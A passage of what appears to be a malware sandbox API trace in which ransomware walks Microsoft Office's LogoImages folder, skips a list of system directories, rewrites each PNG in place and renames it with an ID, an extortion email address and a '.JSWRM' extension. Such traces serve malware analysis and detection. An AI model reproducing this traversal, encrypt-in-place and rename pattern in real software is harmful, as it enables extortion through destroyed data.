lpUsedDefaultChar=0x0) returned 40 [0134.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.002] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3145) returned 1 [0134.002] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.002] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0134.005] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.005] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0134.005] CloseHandle (hObject=0x238) returned 1 [0134.005] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.006] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe90, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-black_scale-180.png", cAlternateFileName="WINPRO~2.PNG")) returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="windows") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="recovery") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="system volume information") returned 1 [0134.006] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0134.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.007] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3728) returned 1 [0134.008] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.008] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe90, lpOverlapped=0x0) returned 1 [0134.009] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.009] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe90, lpOverlapped=0x0) returned 1 [0134.009] CloseHandle (hObject=0x238) returned 1 [0134.009] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.011] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x814, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-black_scale-80.png", cAlternateFileName="WIE37A~1.PNG")) returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="windows") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="recovery") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="system volume information") returned 1 [0134.011] lstrcmpiW (lpString1="WinProjLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0134.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.012] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2068) returned 1 [0134.012] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.012] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0134.070] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.070] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0134.070] CloseHandle (hObject=0x238) returned 1 [0134.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.072] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8ff, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-white_scale-100.png", cAlternateFileName="WIA969~1.PNG")) returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="windows") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="recovery") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="system volume information") returned 1 [0134.072] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0134.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0134.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0134.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.074] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2303) returned 1 [0134.074] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.074] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0134.076] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.076] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0134.076] CloseHandle (hObject=0x238) returned 1 [0134.076] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.077] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-white_scale-140.png", cAlternateFileName="WID2E1~1.PNG")) returned 1 [0134.077] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0134.077] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0134.077] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0134.077] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="windows") returned 1 [0134.077] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="recovery") returned 1 [0134.077] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0134.078] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0134.078] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.078] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="system volume information") returned 1 [0134.078] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0134.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.079] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3151) returned 1 [0134.079] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.079] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0134.080] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.080] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0134.080] CloseHandle (hObject=0x238) returned 1 [0134.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.082] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8a15c5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xea3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-white_scale-180.png", cAlternateFileName="WI9EA3~1.PNG")) returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="windows") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="recovery") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", 